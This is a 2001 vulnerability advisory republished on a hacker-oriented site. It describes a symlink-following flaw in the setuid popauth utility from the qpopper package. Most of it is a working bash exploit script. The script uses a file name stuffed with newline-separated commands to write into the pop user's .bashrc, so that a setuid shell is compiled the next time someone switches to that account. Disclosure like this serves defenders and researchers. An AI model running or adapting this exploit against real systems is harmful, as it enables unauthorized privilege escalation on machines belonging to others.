NETSYS.COM - The Intelligent Hacker's Choice - http://www.netsys.com/library/alerts/exploits/popauth.txtThe Intelligent Hacker's Choice.. Systems, Networks, Administration.. since 1977 >>>> advertisement Datee: 12/17/2001 From: Paul Starzetz Subject: Advisory: popauth Hi, there is a symlink problem in the popauth utility, which is part of the qpoper package. The binary is often istalled suid pop and follows symlinks in the -trace file option. This problem has been reported to vendors in June 2001. Impact: in case of suid popauth and valid shell for user pop, the attached script will create suid-pop shell, if someone su to pop. This may happen as a part of some automated check script (startup script). This vulnerability is not very crucial, however it should be reported at least once. /ih ######### mkbs2.sh ########### #!/bin/bash # popauth symlink follow vuln by IhaQueR # this will create .bashrc for user pop # and ~pop/sup suid shell FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include \nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""') ln -s /var/lib/pop/.bashrc "$FILE" /usr/sbin/popauth -trace "$FILE" ########## end ################# Copyright © 2003 netsys.com All Rights Reserved.